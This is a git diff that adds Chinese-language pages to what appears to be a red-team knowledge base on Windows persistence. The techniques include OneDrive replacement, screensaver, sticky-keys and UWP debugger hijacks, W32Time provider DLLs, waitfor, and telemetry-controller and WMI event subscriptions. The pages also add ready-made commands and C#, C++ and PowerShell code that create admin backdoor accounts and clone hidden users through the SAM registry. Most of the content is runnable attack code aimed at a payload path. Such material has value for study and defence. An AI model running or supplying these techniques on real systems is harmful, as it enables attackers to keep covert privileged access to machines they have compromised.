url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %} + +{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about\_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %} + diff --git a/persistence/uncatelogued/replace-file.md b/persistence/uncatelogued/replace-file.md new file mode 100644 index 0000000..050a22d --- /dev/null +++ b/persistence/uncatelogued/replace-file.md @@ -0,0 +1,19 @@ +# 替换文件 + +这是一种比较无脑,但是某种程度上还挺好用的方法。 + +简单的说就是替换现有的自启动文件,最好的例子大概就是Onedrive了。不需要管理员权限就可以结束进程,并且目录可写,Win10默认会自启动。 + +简单利用示例: + +```text +taskkill /f /im OneDrive.exe +copy c:\Temp\qwqdanchun.exe %LocalAppData%\Microsoft\OneDrive\OneDrive.exe +``` + +另外,也可以修改浏览器等的快捷方式来实现被动启动的效果。具体实现将在后文LNK文件格式处详细讨论。 + +一例修改现有应用文件的攻击: + +{% embed url="https://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/" caption="" %} + diff --git a/persistence/uncatelogued/screen-save.md b/persistence/uncatelogued/screen-save.md new file mode 100644 index 0000000..b41c0ee --- /dev/null +++ b/persistence/uncatelogued/screen-save.md @@ -0,0 +1,20 @@ +# 屏幕保护 + +屏幕保护是Windows的一个功能,使计算机屏幕可以在一段时间不活动后播放动画。 +修改屏保加载的程序可以实现权限维持的效果。 + +命令行: + +```text +#To make sure the SCRNSAVE is on +reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f +reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f +reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f +#For EXE file +reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe +New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe' +#For SCR file +reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe +New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe' +``` + diff --git a/persistence/uncatelogued/sdb.md b/persistence/uncatelogued/sdb.md new file mode 100644 index 0000000..413ebb1 --- /dev/null +++ b/persistence/uncatelogued/sdb.md @@ -0,0 +1,10 @@ +# SDB文件 + +Win10 已不适用 + +参考文章: + +{% embed url="https://pentestlab.blog/2019/12/16/persistence-application-shimming/" caption="" %} + +{% embed url="https://github.com/evil-e/sdb-explorer" caption="" %} + diff --git a/persistence/uncatelogued/sethc.exe.md b/persistence/uncatelogued/sethc.exe.md new file mode 100644 index 0000000..d3a584a --- /dev/null +++ b/persistence/uncatelogued/sethc.exe.md @@ -0,0 +1,15 @@ +# 粘滞键 + +老生常谈的东西了,直接放利用代码: + +```text +#Before Windows Vista +takeown /f sethc.* /a /r /d y +cacls sethc.exe /T /E /G administrators:F +copy /y cmd.exe sethc.exe + +#Suggest you don't use this after Windows Vista. +#If you really like it,try this. +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" +``` + diff --git a/persistence/uncatelogued/ssp-dll.md b/persistence/uncatelogued/ssp-dll.md new file mode 100644 index 0000000..0f0266a --- /dev/null +++ b/persistence/uncatelogued/ssp-dll.md @@ -0,0 +1,10 @@ +# 注册SSP DLL + +## SSP + +安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。LSASS进程在Windows启动期间会加载SSP DLL。 + +注:这种方法一般用来Dump内存并获取密码,只是拿来做权限维持实在是大材小用了,迄今为止也只听说了Lazarus这个朝鲜APT组织这么干过。。。([https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/)](https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/%EF%BC%89) + +再注:找不到现有的POC,自己也懒得写了,所幸 [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 里有一个”Install-SSP”方法,有兴趣的同学可以去看看。至于注入SSP DLL的其他相关内容会在Mimikatz部分专门讨论。 + diff --git a/persistence/uncatelogued/uwp.md b/persistence/uncatelogued/uwp.md new file mode 100644 index 0000000..8c0c9b3 --- /dev/null +++ b/persistence/uncatelogued/uwp.md @@ -0,0 +1,25 @@ +# UWP + +使用调试器选项的Appx/UWP应用程序可以用来做权限维持。 + +Windows系统在启动时会自动启动若干UWP应用,利用其注册表路径或者调试配置可以加载自己的程序,以实现权限维持。 + +示例中展示了如何劫持小娜和人脉,在实际使用时,要自行修改路径以适配APP版本。 + +命令行: + +```text +#First way for Cortana +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe" +#Second way for Cortana +reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe" +#First way for People +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe" +#Second way for People +reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe" +``` + +参考文章: + +{% embed url="https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/" caption="" %} + diff --git a/persistence/uncatelogued/w32time.md b/persistence/uncatelogued/w32time.md new file mode 100644 index 0000000..993ac88 --- /dev/null +++ b/persistence/uncatelogued/w32time.md @@ -0,0 +1,205 @@ +# W32Time + +Windows启动期间将启动服务W32Time并加载w32time.dll。 + +可以通过修改如下两个注册表地址实现加载dll + +```text +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +sc.exe stop w32time +sc.exe start w32time +``` + +Scott Lundgren使用c++开发了gametime时间提供程序。可以使用此DLL来向操作系统注册新的时间提供者。这样可以避免滥用现有的Windows时间提供程序, + +C++: + +```cpp +#include +#include +#include +#define GAMETIME_SVC_KEY_NAME L"System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\GameTime" +static WCHAR g_wzModule[MAX_PATH] = { L'\0' }; +BOOL WINAPI DllMain( + _In_ HINSTANCE hInstDll, + _In_ DWORD fdwReason, + _In_ LPVOID lpvReserved +) +{ + UNREFERENCED_PARAMETER(hInstDll); + UNREFERENCED_PARAMETER(lpvReserved); + switch (fdwReason) + { + case DLL_PROCESS_ATTACH: + (void)GetModuleFileNameW(hInstDll, g_wzModule, MAX_PATH); + break; + } + return (TRUE); +} +void WINAPI OutputError( + _In_ PWCHAR pwzMessage, + _In_ DWORD dwError +) +{ + WCHAR wzError[1024] = { L'\0' }; + if (SUCCEEDED(StringCchPrintfW(wzError, 1024, L"ERROR: [0x%0.8x] [%d] %s", dwError, dwError, pwzMessage))) + { + OutputDebugStringW(wzError); + } +} +/* + * + */ +HRESULT __stdcall TimeProvOpen( + _In_ WCHAR *wszName, + _In_ TimeProvSysCallbacks *pSysCallbacks, + _Out_ TimeProvHandle *phTimeProv +) +{ + UNREFERENCED_PARAMETER(pSysCallbacks); + UNREFERENCED_PARAMETER(phTimeProv); + OutputDebugStringW(wszName); + return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE)); +} +/* + * + */ +HRESULT __stdcall TimeProvCommand( + _In_ TimeProvHandle hTimeProv, + _In_ TimeProvCmd eCmd, + _In_ PVOID pvArgs +) +{ + UNREFERENCED_PARAMETER(hTimeProv); + UNREFERENCED_PARAMETER(eCmd); + UNREFERENCED_PARAMETER(pvArgs); + return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE)); +} +/* + * + */ +HRESULT __stdcall TimeProvClose( + _In_ TimeProvHandle hTimeProv +) +{ + UNREFERENCED_PARAMETER(hTimeProv); + return (S_OK); +} +/* + * Register + * + * This is an exported helper function to register the GameTime time provider + * + * This is not transacted; failures may leave the registry in an inconsistent state + * + */ +void CALLBACK Register( + _In_ HWND hWnd, + _In_ HINSTANCE hInst, + _In_ LPSTR pwzCmdLine, + _In_ int nCmdShow) +{ + HKEY hkTimeProvider = NULL; + LONG nRet; + DWORD dwOne = 1; + UNREFERENCED_PARAMETER(hWnd); + UNREFERENCED_PARAMETER(hInst); + UNREFERENCED_PARAMETER(pwzCmdLine); + UNREFERENCED_PARAMETER(nCmdShow); + OutputDebugStringW(L"Register\n"); + /* + * Time providers manually register with the Win32 Time Service + * See https://msdn.microsoft.com/en-us/library/windows/desktop/ms724869(v=vs.85).aspx + * + * Begin by creating the key for the provider + */ + nRet = RegCreateKeyExW(HKEY_LOCAL_MACHINE, + GAMETIME_SVC_KEY_NAME, + 0, + NULL, + 0, + KEY_ALL_ACCESS, + NULL, + &hkTimeProvider, + NULL); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + /* + * Populate the three required time provider configuration values + * The three required values are: DllName, Enabled, InputProvider + */ + nRet = RegSetValueExW(hkTimeProvider, + L"DllName", + 0, + REG_SZ, + (LPBYTE)g_wzModule, + (DWORD)wcslen(g_wzModule)*sizeof(WCHAR)+sizeof(WCHAR)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + nRet = RegSetValueExW(hkTimeProvider, + L"Enabled", + 0, + REG_DWORD, + (LPBYTE)&dwOne, + sizeof(dwOne)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + nRet = RegSetValueExW(hkTimeProvider, + L"InputProvider", + 0, + REG_DWORD, + (LPBYTE)&dwOne, + sizeof(dwOne)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } +ErrorExit: + if (NULL != hkTimeProvider) + { + (void)RegCloseKey(hkTimeProvider); + } + return; +} +void CALLBACK Deregister( + _In_ HWND hWnd, + _In_ HINSTANCE hInst, + _In_ LPSTR pwzCmdLine, + _In_ int nCmdShow) +{ + long nRet; + UNREFERENCED_PARAMETER(hWnd); + UNREFERENCED_PARAMETER(hInst); + UNREFERENCED_PARAMETER(pwzCmdLine); + UNREFERENCED_PARAMETER(nCmdShow); + OutputDebugStringW(L"Unregister\n"); + nRet = RegDeleteKeyW(HKEY_LOCAL_MACHINE, GAMETIME_SVC_KEY_NAME); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegDeleteKeyW failed!", nRet); + goto ErrorExit; + } +ErrorExit: + return; +} +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/en-gb/windows/win32/sysinfo/time-provider" caption="" %} + +{% embed url="https://github.com/scottlundgren/w32time" caption="" %} + +{% embed url="https://pentestlab.blog/2019/10/22/persistence-time-providers/" caption="" %} + diff --git a/persistence/uncatelogued/waitfor.md b/persistence/uncatelogued/waitfor.md new file mode 100644 index 0000000..882ee46 --- /dev/null +++ b/persistence/uncatelogued/waitfor.md @@ -0,0 +1,19 @@ +# Waitfor + +是存在于Windows上,用来同步网络中计算机,可以发送或等待系统上的信号的程序,默认位置在“C:\Windows\System32\waitfor.exe” + +```text +#Target computer +waitfor persist && C:\Temp\qwqdanchun.exe +#Use this to trigger +waitfor /s 127.0.0.1 /si persist +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731613\(v=ws.11\)?redirectedfrom=MSDN" caption="" %} + +{% embed url="https://github.com/3gstudent/Waitfor-Persistence" caption="" %} + +{% embed url="https://twitter.com/danielhbohannon/status/872258924078092288" caption="" %} + diff --git a/persistence/uncatelogued/windows-telemetry.md b/persistence/uncatelogued/windows-telemetry.md new file mode 100644 index 0000000..7e9f32e --- /dev/null +++ b/persistence/uncatelogued/windows-telemetry.md @@ -0,0 +1,20 @@ +# Windows Telemetry + +在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务,如果加入了Microsoft用户反馈改善计划,该服务就会监测系统异常并收集反馈到微软。 + +命令行: + +```text +REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" +REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f +REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f +``` + +原理: + +{% embed url="https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/" caption="" %} + +利用代码: + +{% embed url="https://github.com/360-Linton-Lab/Telemetry" caption="" %} + diff --git a/persistence/user/README.md b/persistence/user/README.md new file mode 100644 index 0000000..426b893 --- /dev/null +++ b/persistence/user/README.md @@ -0,0 +1,2 @@ +# 用户账户 + diff --git a/persistence/user/add-user.md b/persistence/user/add-user.md new file mode 100644 index 0000000..8eeef40 --- /dev/null +++ b/persistence/user/add-user.md @@ -0,0 +1,176 @@ +# 新建用户 + +新建用户并添加管理员及远程访问权限 + +命令行: + +```text +net user qwqdanchun password /add /y +net localgroup administrators qwqdanchun /add +net localgroup "remote desktop users" qwqdanchun /add +``` + +Powershell: + +```text +set wsnetwork=CreateObject("WSCRIPT.NETWORK") +os="WinNT://"&wsnetwork.ComputerName +Set ob=GetObject(os) +Set oe=GetObject(os&"/Administrators,group") +Set od=ob.Create("user","qwqdanchun") +od.SetPassword "password" +od.SetInfo +Set of=GetObject(os&"/admin",user) +oe.add os&"/admin" +``` + +Powershell(另一个版本): + +```text +$Username = "qwqdanchun" +$P = "password" +$Password = ConvertTo-SecureString $P -AsPlainText -Force +New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user." +Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun" +``` + +c\#(使用系统 API 函数): + +```csharp +using System; +using System.Runtime.InteropServices; +namespace Bypass360Add +{ + public static class BypassUAC_csharp + { + [DllImport("kernel32.dll")] + static extern void ExitProcess(uint uExitCode); + public static void Main(string[] args) + { + LocalGroupUserHelper local = new LocalGroupUserHelper(); + string username = "qwqdanchun"; + string password = "password"; + string groupname = "Administrators"; + local.AddUser(null, username, password, null); + local.GroupAddMembers(null, groupname, username); + ExitProcess(1); + } + } + public class LocalGroupUserHelper + { + [DllImport("Netapi32.dll")] + extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err); + [DllImport("Netapi32.dll")] + extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname, + int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries); + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public struct LOCALGROUP_MEMBERS_INFO_3 + { + public string domainandname; // //lgrmi3_domainandname + } + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public struct USER_INFO_1 + { + public string usri1_name; + public string usri1_password; + public int usri1_password_age; + public int usri1_priv; + public string usri1_home_dir; + public string comment; + public int usri1_flags; + public string usri1_script_path; + } + public void AddUser(string serverName, string userName, string password, string strComment) + { + USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例 + NewUser.usri1_name = userName; // Allocates the username + NewUser.usri1_password = password; // allocates the password + NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER + NewUser.usri1_home_dir = null; // We didn't supply a Home Directory + NewUser.comment = strComment; // Comment on the User + NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path + if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0 + { + Console.WriteLine("Error Adding User"); + } + } + public void GroupAddMembers(string serverName, string groupName, string userName) + { + LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3(); + NewMember.domainandname = userName; + if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0 + { + Console.WriteLine("Error Adding Group Member"); + } + } + } +} +``` + +c++\(重写AddUser\): + +```cpp +#include "ApiAddUser.h" + + + +int wmain(int argc, wchar_t* argv[]) +{ + UNICODE_STRING UserName; + UNICODE_STRING PassWord; + HANDLE ServerHandle = NULL; + HANDLE DomainHandle = NULL; + HANDLE UserHandle = NULL; + ULONG GrantedAccess; + ULONG RelativeId; + NTSTATUS Status = NULL; + HMODULE hSamlib = NULL; + HMODULE hNtdll = NULL; + HMODULE hNetapi32 = NULL; + LSA_HANDLE hPolicy = NULL; + LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 }; + PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL; + USER_ALL_INFORMATION uai = { 0 }; + + + hSamlib = LoadLibraryA("samlib.dll"); + hNtdll = LoadLibraryA("ntdll"); + + pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect"); + pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain"); + pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain"); + pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser"); + pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); + pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); + + RtlInitUnicodeString(&UserName, L"Admin"); + RtlInitUnicodeString(&PassWord, L"Admin"); + + Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);; + Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy); + Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo); + + Status = SamOpenDomain(ServerHandle, + DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, + DomainInfo->DomainSid, + &DomainHandle); + + Status = SamCreateUser2InDomain(DomainHandle, + &UserName, + USER_NORMAL_ACCOUNT, + USER_ALL_ACCESS | DELETE | WRITE_DAC, + &UserHandle,&GrantedAccess,&RelativeId); + + RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer); + uai.NtPasswordPresent = TRUE; + uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT; + + + Status = SamSetInformationUser(UserHandle, + UserAllInformation, + &uai); + + return 0; +} +``` + diff --git a/persistence/user/hide-user.md b/persistence/user/hide-user.md new file mode 100644 index 0000000..05d4319 --- /dev/null +++ b/persistence/user/hide-user.md @@ -0,0 +1,158 @@ +# 隐藏用户 + +原理: +1.用户名要以$结尾,输入net user无法获取 +2.删除自身账户,再导入克隆的账户注册表,使注册表存在但是查不到账户 + +Powershell: + +```text +function Create-Clone +{ +<# +.SYNOPSIS +This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user. +.PARAMETER u +The clone username +.PARAMETER p +The clone user password +.PARAMETER cu +The user to clone, default administrator +.EXAMPLE +Create-Clone -u evi1cg -p evi1cg123 -cu administrator +#> + Param( + [Parameter(Mandatory=$true)] + [String] + $u, + [Parameter(Mandatory=$true)] + [String] + $p, + [Parameter(Mandatory=$false)] + [String] + $cu = "administrator" + ) + function upReg{ + "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini + "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini + cmd /c "regini $env:temp\up.ini" + Remove-Item $env:temp\up.ini + } + function downreg { + "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini + "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini + cmd /c "regini $env:temp\down.ini" + Remove-Item $env:temp\down.ini + } + function Create-user ([string]$Username,[string]$Password) { + $group = "Administrators" + $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username" + if (!$existing) { + Write-Host "[*] Creating new local user $Username with password $Password" + & NET USER $Username $Password /add /y /expires:never | Out-Null + Write-Host "[*] Adding local user $Username to $group." + & NET LOCALGROUP $group $Username /add | Out-Null + } + else { + Write-Host "[*] Adding existing user $Username to $group." + & NET LOCALGROUP $group $Username /add | Out-Null + $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" + $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username } + Write-Host "[*] Setting password for existing local user $Username" + $exist.SetPassword($Password) + } + Write-Host "[*] Ensuring password for $Username never expires." + & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null + } + function GetUser-Key([string]$user) + { + cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini" + cmd /c "regini $env:temp\$user.ini" + Remove-Item $env:temp\$user.ini + if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){ + cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"" + $file = Get-Content "$env:temp\$user.reg" | Out-String + $pattern="@=hex\((.*?)\)\:" + $file -match $pattern |Out-Null + $key = "00000"+$matches[1] + Write-Host "[!]"$key + return $key + }else { + Write-Host "[-] SomeThing Wrong !" + } + } + function Clone ([string]$ukey,[string]$cukey) { + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini + "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini + cmd /c " regini $env:temp\f.ini" + Remove-Item $env:temp\f.ini + $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String + $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String + Write-Host "[*] Get clone user'F value" + $cuFreg = Get-Item -Path $cureg.Trim() + $cuFvalue = $cuFreg.GetValue('F') + Write-Host "[*] Change user'F value" + Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue + $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey" + cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()" + } + function Main () { + if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) + { + Write-Output "Script must be run as administrator" + break + } + Write-Output "[*] Start" + Write-Output "[*] Tring to change reg privilege !" + upReg + if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){ + Write-Host "[-] The User to Clone does not exist !" + Write-Output "[*] Change reg privilege back !" + downReg + Write-Output "[*] Exiting !" + } + else { + if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){ + $tmp = "1" + } + else{ + $tmp = "0" + } + Write-Output "[*] Create User..." + Create-user $u $p + Write-Output "[*] Get User $u's Key .." + $ukey = GetUser-Key $u |Out-String + Write-Output "[*] Get User $cu's Key .." + $cukey = GetUser-Key $cu |Out-String + Write-Output "[*] Clone User.." + Clone $ukey $cukey + if($tmp -eq 1 ){ + Write-Output "[*] Delete User.." + cmd /c "net User $u /del " |Out-Null + }else{ Write-Output "[*] Don't need to delete.."} + cmd /c "regedit /s $env:temp\$u.reg" + cmd /c "regedit /s $env:temp\out.reg" + Remove-Item $env:temp\*.reg + Write-Output "[*] Change reg privilege back !" + downreg + Write-Output "[*] Done" + } + } + Main +} +``` + +参考文章: + +{% embed url="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/" caption="" %} + +{% embed url="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1" caption="" %} + diff --git a/persistence/wmi/README.md b/persistence/wmi/README.md new file mode 100644 index 0000000..4e74a94 --- /dev/null +++ b/persistence/wmi/README.md @@ -0,0 +1,2 @@ +# WMI + diff --git a/persistence/wmi/wmi-event.md b/persistence/wmi/wmi-event.md new file mode 100644 index 0000000..2576abd --- /dev/null +++ b/persistence/wmi/wmi-event.md @@ -0,0 +1,109 @@ +# WMI事件 + +## WMI事件 + +WMI事件,是特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。 + +## 利用代码 + +命令行: + +```text +#注册一个事件过滤器,该过滤器是开机2分钟到2分半钟,由于是永久WMI事件订阅,故需要管理员权限,最终获取到权限也是system权限 +wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150" +#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll +wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll" +#绑定事件 过滤器和事件消费者 +wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\"" +``` + +Powershell: + +```text +$wmiParams = @{ + NameSpace = 'root\subscription' +} +# Creating a new event filter +$wmiParams.Class = '__EventFilter' +$wmiParams.Arguments = @{ + Name = 'BugSecFilter' + EventNamespace = 'root\CIMV2' + QueryLanguage = 'WQL' + Query = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'" +} +$filterResult = Set-WmiInstance @wmiParams +# Creating a new consumer +$wmiParams.Class = 'CommandLineEventConsumer' +$wmiParams.Arguments = @{ + Name = 'BugSecConsumer' + CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll" +} +$consumerResult = Set-WmiInstance @wmiParams +# Bind filter to consumer +$wmiParams.Class = '__FilterToConsumerBinding' +$wmiParams.Arguments = @{ + Filter = $filterResult + Consumer = $consumerResult +} +Set-WmiInstance @wmiParams +``` + +C\#: + +```csharp +using System; +using System.Text; +using System.Management; +namespace WMIPersistence +{ + class Program + { + static void Main(string[] args) + { + PersistWMI(); + } + static void PersistWMI() + { + ManagementObject myEventFilter = null; + ManagementObject myEventConsumer = null; + ManagementObject myBinder = null; + String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"; + String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " + + "WHERE TargetInstance ISA \"Win32_Process\" " + + "AND TargetInstance.Name = \"chrome.exe\""; + try + { + ManagementScope scope = new ManagementScope(@"\\.\root\subscription"); + ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null); + WqlEventQuery myEventQuery = new WqlEventQuery(strQuery); + myEventFilter = wmiEventFilter.CreateInstance(); + myEventFilter["Name"] = "BugSecFilter"; + 